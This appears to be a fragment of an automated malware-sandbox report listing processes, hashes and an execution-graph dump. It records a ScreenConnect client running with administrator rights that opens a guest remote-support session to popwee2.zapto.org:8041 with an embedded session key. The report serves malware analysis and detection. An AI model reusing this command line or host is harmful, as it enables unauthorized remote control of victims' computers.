                                                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:06:44:39
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:06:44:40
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User"
                                                                                                                                                                                                                                                                  Imagebase:0x7e0000
                                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                                                                                                                                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                  Start time:06:44:51
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                                                                                                                                                                                                                                                                  Imagebase:0xcb0000
                                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:06:44:52
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:false


                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:3.8%
                                                                                                                                                                                                                                                                    Total number of Nodes:1465
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
5982 f249b9 5985 f24869 _free 15 API calls 5982->5985 5983->5980 5986 f24a2c 5983->5986 5992 f24a4b 5983->5992 5984 f249b0 5984->5982 5989 f24a3e 5984->5989 6009 f279bb 5984->6009 5985->5986 6018 f24c65 5986->6018 5990 f2474d _abort 6 API calls 5989->5990 5991 f24a4a 5990->5991 5993 f24a57 5992->5993 5994 f2480c _abort 15 API calls 5993->5994 5995 f24a85 5994->5995 5996 f279bb 21 API calls 5995->5996 5997 f24ab1 5996->5997 5998 f2474d _abort 6 API calls 5997->5998 5999 f24ae0 _abort 5998->5999 6000 f24b81 FindFirstFileExA 5999->6000 6001 f24bd0 6000->6001 6002 f24a4b 21 API calls 6001->6002 6004 f23201 6003->6004 6005 f231fd 6003->6005 6004->6005 6006 f2480c _abort 15 API calls 6004->6006 6005->5984 6007 f2322f 6006->6007 6008 f24869 _free 15 API calls 6007->6008 6008->6005 6013 f2790a 6009->6013 6010 f2791f 6011 f247f9 __dosmaperr 15 API calls 6010->6011 6012 f27924 6010->6012 6014 f2794a 6011->6014 6012->5984 6013->6010 6013->6012 6016 f2795b 6013->6016 6015 f2473d _abort 21 API calls 6014->6015 6015->6012 6016->6012 6017 f247f9 __dosmaperr 15 API calls 6016->6017 6017->6014 6019 f24c6f 6018->6019 6020 f24c7f 6019->6020 6021 f24869 _free 15 API calls 6019->6021 6022 f24869 _free 15 API calls 6020->6022 6021->6019 6023 f24c86 6022->6023 6023->5979 6024 f214bb IsProcessorFeaturePresent 6025 f214d0 6024->6025 6028 f21493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6025->6028 6027 f215b3 6028->6027 6029 f21ab8 6030 f21aef 6029->6030 6031 f21aca 6029->6031 6031->6030 6038 f2209a 6031->6038 6036 f23e89 33 API calls 6037 f21b0d 6036->6037 6039 f223c3 43 API calls 6038->6039 6040 f21afc 6039->6040 6041 f220a3 6040->6041 6042 f223c3 43 API calls 6041->6042 6043 f21b06 6042->6043 6043->6036 6347 f2383f 6349 f2384b ___scrt_is_nonwritable_in_current_image 6347->6349 6348 f23882 _abort 6349->6348 6355 f256e2 EnterCriticalSection 6349->6355 6351 f2385f 6352 f267cb __fassign 15 API calls 6351->6352 6353 f2386f 6352->6353 6356 f23888 
6353->6356 6355->6351 6359 f2572a LeaveCriticalSection 6356->6359 6358 f2388f 6358->6348 6359->6358 6133 f29160 6136 f2917e 6133->6136 6135 f29176 6140 f29183 6136->6140 6137 f299d3 16 API calls 6139 f293af 6137->6139 6138 f29218 6138->6135 6139->6135 6140->6137 6140->6138 5853 f28ce1 5854 f28d01 5853->5854 5857 f28d38 5854->5857 5856 f28d2b 5858 f28d3f 5857->5858 5859 f28da0 5858->5859 5863 f28d5f 5858->5863 5861 f2988e 5859->5861 5866 f29997 5859->5866 5861->5856 5863->5861 5864 f29997 16 API calls 5863->5864 5865 f298be 5864->5865 5865->5856 5867 f299a0 5866->5867 5870 f2a06f 5867->5870 5869 f28dee 5869->5856 5872 f2a0ae __startOneArgErrorHandling 5870->5872 5871 f2a130 __startOneArgErrorHandling 5874 f2a786 __startOneArgErrorHandling 15 API calls 5871->5874 5875 f2a166 _ValidateLocalCookies 5871->5875 5872->5871 5876 f2a472 5872->5876 5874->5875 5875->5869 5877 f2a495 __raise_exc RaiseException 5876->5877 5878 f2a490 5877->5878 5878->5871 6044 f256a1 6045 f256ac 6044->6045 6046 f259b3 6 API calls 6045->6046 6047 f256d5 6045->6047 6048 f256d1 6045->6048 6046->6045 6050 f256f9 6047->6050 6051 f25725 6050->6051 6052 f25706 6050->6052 6051->6048 6053 f25710 DeleteCriticalSection 6052->6053 6053->6051 6053->6053 6054 f25ba6 6055 f25bd7 6054->6055 6057 f25bb1 6054->6057 6056 f25bc1 FreeLibrary 6056->6057 6057->6055 6057->6056 6360 f26026 6361 f2602b 6360->6361 6362 f2604e 6361->6362 6364 f25c56 6361->6364 6365 f25c63 6364->6365 6369 f25c85 6364->6369 6366 f25c71 DeleteCriticalSection 6365->6366 6367 f25c7f 6365->6367 6366->6366 6366->6367 6368 f24869 _free 15 API calls 6367->6368 6368->6369 6369->6361 5879 f233e5 5880 f233f7 5879->5880 5881 f233fd 5879->5881 5883 f23376 5880->5883 5887 f233a0 5883->5887 5888 f23383 5883->5888 5884 f2339a 5886 f24869 _free 15 API calls 5884->5886 5885 f24869 _free 15 API calls 5885->5888 5886->5887 5887->5881 5888->5884 5888->5885 5889 f29beb 5890 f29c04 __startOneArgErrorHandling 5889->5890 5891 f2a1c4 16 API calls 5890->5891 5892 
f29c2d __startOneArgErrorHandling 5890->5892 5891->5892 6370 f2142e 6373 f22cf0 6370->6373 6372 f2143f 6374 f244a8 _abort 15 API calls 6373->6374 6375 f22d07 _ValidateLocalCookies 6374->6375 6375->6372 6376 f2452d 6384 f25858 6376->6384 6378 f24537 6379 f24541 6378->6379 6380 f244a8 _abort 15 API calls 6378->6380 6381 f24549 6380->6381 6382 f24556 6381->6382 6389 f24559 6381->6389 6385 f25741 _abort 5 API calls 6384->6385 6386 f2587f 6385->6386 6387 f25897 TlsAlloc 6386->6387 6388 f25888 _ValidateLocalCookies 6386->6388 6387->6388 6388->6378 6390 f24563 6389->6390 6391 f24569 6389->6391 6393 f258ae 6390->6393 6391->6379 6394 f25741 _abort 5 API calls 6393->6394 6395 f258d5 6394->6395 6396 f258e1 _ValidateLocalCookies 6395->6396 6397 f258ed TlsFree 6395->6397 6396->6391 6397->6396 6058 f26893 GetProcessHeap 6141 f22f53 6142 f22f62 6141->6142 6143 f22f7e 6141->6143 6142->6143 6145 f22f68 6142->6145 6144 f2522b 46 API calls 6143->6144 6147 f22f85 GetModuleFileNameA 6144->6147 6146 f247f9 __dosmaperr 15 API calls 6145->6146 6148 f22f6d 6146->6148 6149 f22fa9 6147->6149 6150 f2473d _abort 21 API calls 6148->6150 6164 f23077 6149->6164 6151 f22f77 6150->6151 6154 f231ec 15 API calls 6155 f22fd3 6154->6155 6156 f22fe8 6155->6156 6157 f22fdc 6155->6157 6158 f23077 33 API calls 6156->6158 6159 f247f9 __dosmaperr 15 API calls 6157->6159 6161 f22ffe 6158->6161 6163 f22fe1 6159->6163 6160 f24869 _free 15 API calls 6160->6151 6162 f24869 _free 15 API calls 6161->6162 6161->6163 6162->6163 6163->6160 6166 f2309c 6164->6166 6165 f255b6 33 API calls 6165->6166 6166->6165 6168 f230fc 6166->6168 6167 f22fc6 6167->6154 6168->6167 6169 f255b6 33 API calls 6168->6169 6169->6168 5893 f25fd0 5894 f25fdc ___scrt_is_nonwritable_in_current_image 5893->5894 5905 f256e2 EnterCriticalSection 5894->5905 5896 f25fe3 5906 f25c8b 5896->5906 5898 f25ff2 5899 f26001 5898->5899 5919 f25e64 GetStartupInfoW 5898->5919 5930 f2601d 5899->5930 5902 f26012 _abort 5905->5896 5907 f25c97 
___scrt_is_nonwritable_in_current_image 5906->5907 5908 f25ca4 5907->5908 5909 f25cbb 5907->5909 5910 f247f9 __dosmaperr 15 API calls 5908->5910 5933 f256e2 EnterCriticalSection 5909->5933 5912 f25ca9 5910->5912 5913 f2473d _abort 21 API calls 5912->5913 5915 f25cb3 _abort 5913->5915 5914 f25cf3 5941 f25d1a 5914->5941 5915->5898 5916 f25cc7 5916->5914 5934 f25bdc 5916->5934 5920 f25e81 5919->5920 5921 f25f13 5919->5921 5920->5921 5922 f25c8b 22 API calls 5920->5922 5925 f25f1a 5921->5925 5923 f25eaa 5922->5923 5923->5921 5924 f25ed8 GetFileType 5923->5924 5924->5923 5929 f25f21 5925->5929 5926 f25f64 GetStdHandle 5926->5929 5927 f25fcc 5927->5899 5928 f25f77 GetFileType 5928->5929 5929->5926 5929->5927 5929->5928 5950 f2572a LeaveCriticalSection 5930->5950 5932 f26024 5932->5902 5933->5916 5935 f2480c _abort 15 API calls 5934->5935 5938 f25bee 5935->5938 5936 f25bfb 5937 f24869 _free 15 API calls 5936->5937 5939 f25c4d 5937->5939 5938->5936 5944 f259b3 5938->5944 5939->5916 5949 f2572a LeaveCriticalSection 5941->5949 5943 f25d21 5943->5915 5945 f25741 _abort 5 API calls 5944->5945 5946 f259da 5945->5946 5947 f259f8 InitializeCriticalSectionAndSpinCount 5946->5947 5948 f259e3 _ValidateLocalCookies 5946->5948 5947->5948 5948->5938 5949->5943 5950->5932 6398 f27a10 6401 f27a27 6398->6401 6402 f27a35 6401->6402 6403 f27a49 6401->6403 6404 f247f9 __dosmaperr 15 API calls 6402->6404 6405 f27a51 6403->6405 6406 f27a63 6403->6406 6407 f27a3a 6404->6407 6408 f247f9 __dosmaperr 15 API calls 6405->6408 6410 f23f72 __fassign 33 API calls 6406->6410 6413 f27a22 6406->6413 6411 f2473d _abort 21 API calls 6407->6411 6409 f27a56 6408->6409 6412 f2473d _abort 21 API calls 6409->6412 6410->6413 6411->6413 6412->6413 6170 f27351 6171 f2735e 6170->6171 6172 f2480c _abort 15 API calls 6171->6172 6173 f27378 6172->6173 6174 f24869 _free 15 API calls 6173->6174 6175 f27384 6174->6175 6176 f2480c _abort 15 API calls 6175->6176 6180 f273aa 6175->6180 6177 f2739e 6176->6177 6179 f24869 
_free 15 API calls 6177->6179 6178 f259b3 6 API calls 6178->6180 6179->6180 6180->6178 6181 f273b6 6180->6181 6414 f27419 6424 f27fb2 6414->6424 6418 f27426 6437 f2828e 6418->6437 6421 f27450 6422 f24869 _free 15 API calls 6421->6422 6423 f2745b 6422->6423 6441 f27fbb 6424->6441 6426 f27421 6427 f281ee 6426->6427 6428 f281fa ___scrt_is_nonwritable_in_current_image 6427->6428 6461 f256e2 EnterCriticalSection 6428->6461 6430 f28270 6475 f28285 6430->6475 6432 f28205 6432->6430 6434 f28244 DeleteCriticalSection 6432->6434 6462 f2901c 6432->6462 6433 f2827c _abort 6433->6418 6435 f24869 _free 15 API calls 6434->6435 6435->6432 6438 f282a4 6437->6438 6439 f27435 DeleteCriticalSection 6437->6439 6438->6439 6440 f24869 _free 15 API calls 6438->6440 6439->6418 6439->6421 6440->6439 6442 f27fc7 ___scrt_is_nonwritable_in_current_image 6441->6442 6451 f256e2 EnterCriticalSection 6442->6451 6444 f2806a 6456 f2808a 6444->6456 6447 f28076 _abort 6447->6426 6449 f27f6b 61 API calls 6450 f27fd6 6449->6450 6450->6444 6450->6449 6452 f27465 EnterCriticalSection 6450->6452 6453 f28060 6450->6453 6451->6450 6452->6450 6459 f27479 LeaveCriticalSection 6453->6459 6455 f28068 6455->6450 6460 f2572a LeaveCriticalSection 6456->6460 6458 f28091 6458->6447 6459->6455 6460->6458 6461->6432 6463 f29028 ___scrt_is_nonwritable_in_current_image 6462->6463 6464 f29039 6463->6464 6465 f2904e 6463->6465 6466 f247f9 __dosmaperr 15 API calls 6464->6466 6474 f29049 _abort 6465->6474 6478 f27465 EnterCriticalSection 6465->6478 6467 f2903e 6466->6467 6469 f2473d _abort 21 API calls 6467->6469 6469->6474 6470 f2906a 6479 f28fa6 6470->6479 6472 f29075 6495 f29092 6472->6495 6474->6432 6733 f2572a LeaveCriticalSection 6475->6733 6477 f2828c 6477->6433 6478->6470 6480 f28fb3 6479->6480 6481 f28fc8 6479->6481 6482 f247f9 __dosmaperr 15 API calls 6480->6482 6486 f28fc3 6481->6486 6498 f27f05 6481->6498 6483 f28fb8 6482->6483 6485 f2473d _abort 21 API calls 6483->6485 6485->6486 6486->6472 6488 f2828e 15 API 
calls 6489 f28fe4 6488->6489 6504 f2732b 6489->6504 6491 f28fea 6511 f29d4e 6491->6511 6494 f24869 _free 15 API calls 6494->6486 6732 f27479 LeaveCriticalSection 6495->6732 6497 f2909a 6497->6474 6499 f27f19 6498->6499 6500 f27f1d 6498->6500 6499->6488 6500->6499 6501 f2732b 21 API calls 6500->6501 6502 f27f3d 6501->6502 6526 f289a7 6502->6526 6505 f27337 6504->6505 6506 f2734c 6504->6506 6507 f247f9 __dosmaperr 15 API calls 6505->6507 6506->6491 6508 f2733c 6507->6508 6509 f2473d _abort 21 API calls 6508->6509 6510 f27347 6509->6510 6510->6491 6512 f29d5d 6511->6512 6514 f29d72 6511->6514 6513 f247e6 __dosmaperr 15 API calls 6512->6513 6517 f29d62 6513->6517 6515 f29dad 6514->6515 6520 f29d99 6514->6520 6516 f247e6 __dosmaperr 15 API calls 6515->6516 6518 f29db2 6516->6518 6519 f247f9 __dosmaperr 15 API calls 6517->6519 6521 f247f9 __dosmaperr 15 API calls 6518->6521 6524 f28ff0 6519->6524 6689 f29d26 6520->6689 6523 f29dba 6521->6523 6525 f2473d _abort 21 API calls 6523->6525 6524->6486 6524->6494 6525->6524 6527 f289b3 ___scrt_is_nonwritable_in_current_image 6526->6527 6528 f289bb 6527->6528 6530 f289d3 6527->6530 6551 f247e6 6528->6551 6529 f28a71 6532 f247e6 __dosmaperr 15 API calls 6529->6532 6530->6529 6536 f28a08 6530->6536 6535 f28a76 6532->6535 6534 f247f9 __dosmaperr 15 API calls 6545 f289c8 _abort 6534->6545 6537 f247f9 __dosmaperr 15 API calls 6535->6537 6554 f25d23 EnterCriticalSection 6536->6554 6539 f28a7e 6537->6539 6541 f2473d _abort 21 API calls 6539->6541 6540 f28a0e 6542 f28a2a 6540->6542 6543 f28a3f 6540->6543 6541->6545 6544 f247f9 __dosmaperr 15 API calls 6542->6544 6555 f28a92 6543->6555 6547 f28a2f 6544->6547 6545->6499 6549 f247e6 __dosmaperr 15 API calls 6547->6549 6548 f28a3a 6604 f28a69 6548->6604 6549->6548 6552 f244a8 _abort 15 API calls 6551->6552 6553 f247eb 6552->6553 6553->6534 6554->6540 6556 f28ac0 6555->6556 6583 f28ab9 _ValidateLocalCookies 6555->6583 6557 f28ae3 6556->6557 6558 f28ac4 6556->6558 6560 f28b34 6557->6560 6561 
f28b17 6557->6561 6559 f247e6 __dosmaperr 15 API calls 6558->6559 6562 f28ac9 6559->6562 6564 f28b4a 6560->6564 6607 f28f8b 6560->6607 6563 f247e6 __dosmaperr 15 API calls 6561->6563 6565 f247f9 __dosmaperr 15 API calls 6562->6565 6567 f28b1c 6563->6567 6610 f28637 6564->6610 6569 f28ad0 6565->6569 6572 f247f9 __dosmaperr 15 API calls 6567->6572 6570 f2473d _abort 21 API calls 6569->6570 6570->6583 6575 f28b24 6572->6575 6573 f28b91 6579 f28ba5 6573->6579 6580 f28beb WriteFile 6573->6580 6574 f28b58 6576 f28b7e 6574->6576 6577 f28b5c 6574->6577 6578 f2473d _abort 21 API calls 6575->6578 6622 f28417 GetConsoleCP 6576->6622 6581 f28c52 6577->6581 6617 f285ca 6577->6617 6578->6583 6585 f28bdb 6579->6585 6586 f28bad 6579->6586 6584 f28c0e GetLastError 6580->6584 6591 f28b74 6580->6591 6581->6583 6593 f247f9 __dosmaperr 15 API calls 6581->6593 6583->6548 6584->6591 6642 f286ad 6585->6642 6587 f28bb2 6586->6587 6588 f28bcb 6586->6588 6587->6581 6631 f2878c 6587->6631 6636 f2887a 6588->6636 6591->6581 6591->6583 6596 f28c2e 6591->6596 6595 f28c77 6593->6595 6599 f247e6 __dosmaperr 15 API calls 6595->6599 6597 f28c35 6596->6597 6598 f28c49 6596->6598 6600 f247f9 __dosmaperr 15 API calls 6597->6600 6647 f247c3 6598->6647 6599->6583 6602 f28c3a 6600->6602 6603 f247e6 __dosmaperr 15 API calls 6602->6603 6603->6583 6688 f25d46 LeaveCriticalSection 6604->6688 6606 f28a6f 6606->6545 6652 f28f0d 6607->6652 6674 f27eaf 6610->6674 6612 f28647 6613 f2864c 6612->6613 6614 f24424 _abort 33 API calls 6612->6614 6613->6573 6613->6574 6615 f2866f 6614->6615 6615->6613 6616 f2868d GetConsoleMode 6615->6616 6616->6613 6618 f28624 6617->6618 6621 f285ef 6617->6621 6618->6591 6619 f29101 WriteConsoleW CreateFileW 6619->6621 6620 f28626 GetLastError 6620->6618 6621->6618 6621->6619 6621->6620 6624 f2858c _ValidateLocalCookies 6622->6624 6629 f2847a 6622->6629 6624->6591 6625 f28500 WideCharToMultiByte 6625->6624 6626 f28526 WriteFile 6625->6626 6628 f285af GetLastError 6626->6628 6626->6629 
6627 f272b7 35 API calls __fassign 6627->6629 6628->6624 6629->6624 6629->6625 6629->6627 6630 f28557 WriteFile 6629->6630 6683 f26052 6629->6683 6630->6628 6630->6629 6632 f2879b 6631->6632 6633 f28819 WriteFile 6632->6633 6634 f2885d _ValidateLocalCookies 6632->6634 6633->6632 6635 f2885f GetLastError 6633->6635 6634->6591 6635->6634 6641 f28889 6636->6641 6637 f28994 _ValidateLocalCookies 6637->6591 6638 f2890b WideCharToMultiByte 6639 f28940 WriteFile 6638->6639 6640 f2898c GetLastError 6638->6640 6639->6640 6639->6641 6640->6637 6641->6637 6641->6638 6641->6639 6644 f286bc 6642->6644 6643 f2872e WriteFile 6643->6644 6645 f28771 GetLastError 6643->6645 6644->6643 6646 f2876f _ValidateLocalCookies 6644->6646 6645->6646 6646->6591 6648 f247e6 __dosmaperr 15 API calls 6647->6648 6649 f247ce __dosmaperr 6648->6649 6650 f247f9 __dosmaperr 15 API calls 6649->6650 6651 f247e1 6650->6651 6651->6583 6661 f25dfa 6652->6661 6654 f28f1f 6655 f28f27 6654->6655 6656 f28f38 SetFilePointerEx 6654->6656 6659 f247f9 __dosmaperr 15 API calls 6655->6659 6657 f28f50 GetLastError 6656->6657 6658 f28f2c 6656->6658 6660 f247c3 __dosmaperr 15 API calls 6657->6660 6658->6564 6659->6658 6660->6658 6662 f25e07 6661->6662 6665 f25e1c 6661->6665 6663 f247e6 __dosmaperr 15 API calls 6662->6663 6664 f25e0c 6663->6664 6667 f247f9 __dosmaperr 15 API calls 6664->6667 6666 f247e6 __dosmaperr 15 API calls 6665->6666 6668 f25e41 6665->6668 6669 f25e4c 6666->6669 6670 f25e14 6667->6670 6668->6654 6671 f247f9 __dosmaperr 15 API calls 6669->6671 6670->6654 6672 f25e54 6671->6672 6673 f2473d _abort 21 API calls 6672->6673 6673->6670 6675 f27ec9 6674->6675 6676 f27ebc 6674->6676 6678 f27ed5 6675->6678 6679 f247f9 __dosmaperr 15 API calls 6675->6679 6677 f247f9 __dosmaperr 15 API calls 6676->6677 6680 f27ec1 6677->6680 6678->6612 6681 f27ef6 6679->6681 6680->6612 6682 f2473d _abort 21 API calls 6681->6682 6682->6680 6684 f24424 _abort 33 API calls 6683->6684 6685 f2605d 6684->6685 6686 f272d1 __fassign 
33 API calls 6685->6686 6687 f2606d 6686->6687 6687->6629 6688->6606 6692 f29ca4 6689->6692 6691 f29d4a 6691->6524 6693 f29cb0 ___scrt_is_nonwritable_in_current_image 6692->6693 6703 f25d23 EnterCriticalSection 6693->6703 6695 f29cbe 6696 f29cf0 6695->6696 6697 f29ce5 6695->6697 6699 f247f9 __dosmaperr 15 API calls 6696->6699 6704 f29dcd 6697->6704 6700 f29ceb 6699->6700 6719 f29d1a 6700->6719 6702 f29d0d _abort 6702->6691 6703->6695 6705 f25dfa 21 API calls 6704->6705 6708 f29ddd 6705->6708 6706 f29de3 6722 f25d69 6706->6722 6708->6706 6709 f29e15 6708->6709 6711 f25dfa 21 API calls 6708->6711 6709->6706 6712 f25dfa 21 API calls 6709->6712 6714 f29e0c 6711->6714 6715 f29e21 CloseHandle 6712->6715 6713 f29e5d 6713->6700 6717 f25dfa 21 API calls 6714->6717 6715->6706 6718 f29e2d GetLastError 6715->6718 6716 f247c3 __dosmaperr 15 API calls 6716->6713 6717->6709 6718->6706 6731 f25d46 LeaveCriticalSection 6719->6731 6721 f29d24 6721->6702 6723 f25d78 6722->6723 6724 f25ddf 6722->6724 6723->6724 6729 f25da2 6723->6729 6725 f247f9 __dosmaperr 15 API calls 6724->6725 6726 f25de4 6725->6726 6727 f247e6 __dosmaperr 15 API calls 6726->6727 6728 f25dcf 6727->6728 6728->6713 6728->6716 6729->6728 6730 f25dc9 SetStdHandle 6729->6730 6730->6728 6731->6721 6732->6497 6733->6477 6734 f27d1c 6735 f2522b 46 API calls 6734->6735 6736 f27d21 6735->6736 6182 f2365d 6183 f23e89 33 API calls 6182->6183 6184 f23665 6183->6184 6185 f21442 6186 f21a6a GetModuleHandleW 6185->6186 6187 f2144a 6186->6187 6188 f21480 6187->6188 6189 f2144e 6187->6189 6190 f23793 _abort 23 API calls 6188->6190 6191 f21459 6189->6191 6194 f23775 6189->6194 6192 f21488 6190->6192 6195 f2355e _abort 23 API calls 6194->6195 6196 f23780 6195->6196 6196->6191 5951 f29ec3 5952 f29ed9 5951->5952 5953 f29ecd 5951->5953 5953->5952 5954 f29ed2 CloseHandle 5953->5954 5954->5952 6737 f23400 6738 f23412 6737->6738 6739 f23418 6737->6739 6740 f23376 15 API calls 6738->6740 6740->6739 6741 f21e00 6744 f21e1e 
